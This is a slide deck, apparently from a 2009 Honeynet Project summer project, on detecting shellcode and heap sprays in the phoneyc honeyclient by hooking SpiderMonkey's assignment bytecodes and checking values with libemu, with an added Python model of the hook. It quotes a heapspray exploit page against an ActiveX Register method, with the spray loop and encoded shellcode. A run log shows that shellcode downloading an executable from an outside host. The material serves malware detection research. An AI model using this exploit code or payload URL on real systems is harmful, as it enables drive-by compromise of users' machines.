Shellcode and heapspray detection in phoneyc

1. phoneyc with libemu
Zhijie Chen (Honeynet Project Chinese Chapter)
Honeynet Project on Google Summer of Code, 2009
2. Contents
1 Introduction to phoneyc
2 A Typical Web-Based Malware
3 Shellcode detection using Libemu
4 Tracing Mozilla Spidermonkey
  Basic Principles of Spidermonkey
5 Shellcode Detection in phoneyc
  Basic Idea
  Details
  Related Source files
  Implementation
6 Heapspray Detection
7 Current Results
4. Introduction to phoneyc
http://code.google.com/p/phoneyc/
A python honeyclient
Originally written by Jose Nazario.
To detect Web-based Malware
6. A Typical Heapspray Mal-javascript I
<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
  style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+
  ...(shellcode)
  "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
</script>
<SCRIPT language="javascript">
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
  block = block+block+fillblock;
7. A Typical Heapspray Mal-javascript II
memory = new Array();
for (x=0; x<100; x++) memory[x] = block +shellcode;
var buffer = '';
while (buffer.length < 1024) buffer+="\x05";
var ok="1111";
target.Register(ok,buffer);
</script>
</body>
8. Heap Status After Heapspray
[Figure: heap layout after the spray. | More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge | Shellcode |]
9. Detecting Shellcode/Heapspray
SC/HS Detecting Tool: How To Detect It?
11. Introduction to libemu
From its official site:
libemu is a small library written in c offering basic x86 emulation and shellcode detection using GetPC heuristics.
Using libemu one can:
detect shellcodes
execute the shellcodes
profile shellcode behaviour
Using libemu to detect shellcode and heapspray in web-based malware: "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks"
12. Detecting x86 Instructions
SC/HS Detecting Time: When To Detect It?
14. Introduction to spidermonkey
What is SpiderMonkey?
SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript. (http://www.mozilla.org/js/spidermonkey/)
15. Basic Principles of Spidermonkey
All the javascript sources are compiled into js bytecodes.
There is an interpreter that interprets the bytecodes and does certain simple actions.
All the javascript variables are stored as jsval.
Some of the values are stored as an "atom", such as strings.
17. Basic Idea
As both the shellcode manipulation and the spraying of the fillblock involve assignments, the shellcode will be detected immediately on its assignment if we are able to interrupt spidermonkey at the interpretation of certain bytecodes related to an assignment and check its arguments and values for shellcodes.
18. Details I
The following js codes:
function a(){b="c"; var a = 0;}
are compiled into bytecodes like:
00000: bindname "b"
00003: string "c"
00006: setname "b"
00009: pop
00010: zero
00011: setvar 0
00014: pop
00015: stop
So, if we examine the set* opcodes' arguments on the top of the stack at runtime, shellcodes won't get past!
19. Details
To do so, we need to:
Step trace the spidermonkey runtime.
Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) on all kinds of assignments. Unfortunately, different assignments have different bytecodes.
But all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h).
20. Related Source files to be used later
jsapi.h: Basic APIs for javascript execution.
jsdbgapi.h: Basic APIs for debugging spidermonkey.
jsopcode.tbl: All the js opcodes (bytecodes).
jsinterp.c: You can find how each bytecode is interpreted here.
21. Implementation
Register a trace handler into spidermonkey using JS_SetInterrupt. This handler will be called at each step of the bytecode execution.
In the handler:
Use JS_GetTrapOpcode to get the current opcode (bytecode).
Use JS_FrameIterator to get the current runtime stack.
Check the rvalue of the set* bytecodes on the top of the stack with libemu.
Dump the shellcodes and alert.
Continue the execution.
Provide this traced js virtual machine as a python module named honeyjs, so other parts of phoneyc can use this module just the same as python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
23. Basic Idea
Heapspray
A myriad of NOP-like x86 instructions
Accumulating through a loop of assignments
Shellcode in the end of each sledge
Detection
Now: A variable counter to record the mal-assignments (assignments containing shellcode in the r-value).
In the future: entropy? the nozzle way?
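The assignment hook of slides 17 to 21 and the mal-assignment counter of slide 23, modelled in Python as an added example (not phoneyc's honeyjs code). SpiderMonkey's interrupt handler, libemu's shellcode test and the trace events are stand-ins: js_unescape, find_shellcode (a NOP-sled heuristic in place of libemu's GetPC emulation), HoneyJsTrace and the spray threshold of 50 are assumed names and values, and the sample strings are constructed from the slide's script.

```python
import re
from dataclasses import dataclass, field
# Constructed sample values modelled on the slide's script: a short NOP sled
# plus the %u-encoded tail that ends its shellcode string (body elided there).
SC_TAIL = ("%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65"
           "%u6573%u7672%u7265%u652e%u6578%u0000")
SHELLCODE_JS = "%u9090" * 16 + SC_TAIL
BLOCK_JS = "%u9090" * 64          # a tiny stand-in for the sprayed "block"

def js_unescape(s):
    """Model JavaScript unescape(): each %uXXXX becomes one 16-bit jschar."""
    return re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)

def find_shellcode(data, min_sled=32):
    """Hypothetical stand-in for libemu's GetPC test: a run of >= min_sled
    0x90 bytes followed by a payload. Returns the payload offset or -1."""
    m = re.search(rb"\x90{%d,}" % min_sled, data)
    return -1 if m is None or m.end() >= len(data) else m.end()

@dataclass
class HoneyJsTrace:
    """Models the JS_SetInterrupt handler: every bytecode is seen, only the
    JOF_SET (set*) ones are inspected. spray_threshold is an assumed value."""
    spray_threshold: int = 50
    sc_hits: int = 0
    alerts: list = field(default_factory=list)
    def on_opcode(self, opcode, rvalue=None):
        if not opcode.startswith("set") or not isinstance(rvalue, str):
            return None
        data = rvalue.encode("utf-16-le", "surrogatepass")  # raw jschar buffer
        off = find_shellcode(data)
        if off < 0:
            return None
        self.sc_hits += 1                 # counter of mal-assignments
        payload = data[off:].rstrip(b"\x00").decode("latin-1", "replace")
        kind = ("Shellcode & Potential heapspray sledge"
                if self.sc_hits >= self.spray_threshold else "Shellcode Detected")
        self.alerts.append((opcode, kind, payload))
        return kind

def run_sample_trace():
    """Replay the set* bytecodes the slide's heapspray script would execute."""
    t = HoneyJsTrace()
    shellcode, block = js_unescape(SHELLCODE_JS), js_unescape(BLOCK_JS)
    t.on_opcode("setname", shellcode)     # var shellcode = unescape(...)
    t.on_opcode("setvar", 20)             # var headersize = 20 (not a string)
    t.on_opcode("setname", "1111")        # var ok = "1111" (benign string)
    for _ in range(100):                  # memory[x] = block + shellcode
        t.on_opcode("setelem", block + shellcode)
    return t
```

The decoded payload tail of the first alert is the download URL that the slide's run output later reports, and the 100 sprayed assignments push the counter past the threshold the same way the "HIT: 100" alert does.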
26. A Run on ssreader_0day.html
joyan@Jdeb:~/code/phoneyc$ sh go.sh
HONEYCLIENT MODULE TEST
fetching http://172.31.25.227/phoneyc/ssreader_0day.html
[]
==> http://172.31.25.227/phoneyc/ssreader_0day.html
JS EVAL
Executing Javascript:
DEBUG: !!!SC DETECTED at 141847268=141847572size:374
DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
...
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
SSReader Pdg2 Register method overflow
[ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
Runing shellcode... offset:248
DEBUG: Begin analyzing ...
DEBUG: download http://1v1.name/server.exe -> c:\WINDOWS\system32\a.exe
...
URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
Done
[ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
[ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
VBS EVAL
IFRAMES []
HREFS []
FRAMES []
IMAGES []